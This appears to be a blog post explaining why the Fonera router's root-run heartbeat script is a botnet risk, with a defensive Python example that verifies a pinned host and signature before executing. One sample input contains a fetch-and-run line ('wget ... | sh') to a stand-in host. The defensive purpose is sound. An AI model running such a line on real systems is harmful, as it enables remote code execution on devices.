Why it is important to know what is in your Fonera
The Fonera router (or the Linksys, for that matter) is basically a computer. It runs a proper Linux operating system, it is always on, and it sits on a high-bandwidth connection. All the Fon routers connect to Fon central on a regular basis (the heartbeat connection) to see if there are any updates or changes for them to install. This works by downloading a script and then running it as root. If the Fon central server were compromised for more than an hour, it would probably be possible to tell every Fon router in the world to connect somewhere else for its heartbeat information. This would be bad. The central server could then be fixed, but it would be too late: the entire network would be under someone else’s control. It would be an enormous and very well connected botnet. I don’t want to do this, and I don’t want anyone else to be able to do this, so it is important that the source code is open, so that everyone connecting a Fonera to their network can see how secure it is. I am mildly disappointed that there is a binary-only Atheros module in there; however, I don’t think this is critical for the security of the device, or indeed of the network as a whole.
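The weak point described above is that the heartbeat client executes whatever it downloads. The following is an added illustration of the defensive shape such a client could take, not code from Fon or from the Fonera firmware: the router only acts on a heartbeat response if it came from the pinned heartbeat host and carries a valid signature over the script, so a redirected endpoint or a tampered script is refused before anything runs as root. The host name, key and script bytes are constructed placeholders; HMAC stands in for a public-key signature only so the example runs on the Python standard library (a real device would hold just a public key and the server would sign with the private key).

```python
import hashlib
import hmac
from typing import Callable, Tuple

# Constructed placeholder for the heartbeat host baked into the firmware.
PINNED_HEARTBEAT_HOST = "heartbeat.example.invalid"

# Constructed placeholder key. HMAC is used here only so the example runs on
# the standard library; a real router would carry only a public key and
# verify a public-key signature produced at the central server.
VERIFY_KEY = b"constructed-demo-key-not-a-real-secret"


def sign_script(script: bytes) -> str:
    """Server side: produce the tag the router will check (stand-in for signing)."""
    return hmac.new(VERIFY_KEY, script, hashlib.sha256).hexdigest()


def verify_heartbeat(host: str, script: bytes, signature: str) -> Tuple[bool, str]:
    """Router side: decide whether a heartbeat response may be acted on.

    Two independent checks: the response must come from the pinned host
    (so a 'connect somewhere else' instruction cannot silently move the
    router), and the script must carry a valid tag (so a tampered or
    attacker-authored script is refused).
    """
    if host != PINNED_HEARTBEAT_HOST:
        return False, "heartbeat host is not the pinned host"
    expected = sign_script(script)
    # Constant-time comparison so timing does not leak the expected tag.
    if not hmac.compare_digest(expected, signature):
        return False, "signature mismatch"
    return True, "ok"


def run_if_trusted(host: str, script: bytes, signature: str,
                   execute: Callable[[bytes], None]) -> Tuple[str, str]:
    """Only hand the script to `execute` (the stand-in for 'run as root')
    after verification has passed. Returns (outcome, reason)."""
    ok, reason = verify_heartbeat(host, script, signature)
    if not ok:
        return "rejected", reason
    execute(script)
    return "executed", reason


# Constructed sample inputs: a benign script and the three ways it can arrive.
GOOD_SCRIPT = b"#!/bin/sh\necho heartbeat ok\n"
GOOD_SIG = sign_script(GOOD_SCRIPT)
TAMPERED_SCRIPT = b"#!/bin/sh\necho heartbeat ok\nwget http://elsewhere.invalid/x | sh\n"

if __name__ == "__main__":
    ran = []
    print(run_if_trusted(PINNED_HEARTBEAT_HOST, GOOD_SCRIPT, GOOD_SIG, ran.append))
    print(run_if_trusted(PINNED_HEARTBEAT_HOST, TAMPERED_SCRIPT, GOOD_SIG, ran.append))
    print(run_if_trusted("elsewhere.invalid", GOOD_SCRIPT, GOOD_SIG, ran.append))
    print("scripts actually executed:", len(ran))
```

The point of the structure is that `execute` is the only place the script is run, and it is reachable only through `run_if_trusted`, so a compromised or redirected server can at worst cause the router to refuse an update, not to run arbitrary code as root.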
Open Source does matter, and it is inherently more trustable than closed source because you can verify it yourself, and so can lots and lots of other people. The current distribution method for the source is a large .tar.gz file. With this series of posts I am trying to make the critical bits of the source code more open and accessible to more people; this makes it more trustable, and potentially more secure (if issues are found and fixed).